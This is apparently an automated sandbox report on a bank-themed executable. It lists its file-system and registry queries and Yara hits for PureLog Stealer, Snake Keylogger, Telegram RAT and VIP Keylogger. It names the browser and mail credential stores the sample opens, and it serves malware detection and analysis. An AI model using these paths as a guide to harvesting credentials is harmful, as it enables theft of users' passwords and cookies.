Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.5270000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.5270000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1801804713.0000000005270000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match

File source: 00000005.00000002.4215846334.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7656, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7656, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7656, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.5270000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.5270000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1801804713.0000000005270000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match

File source: 00000005.00000002.4215846334.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7656, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.unpack, type: UNPACKEDPE
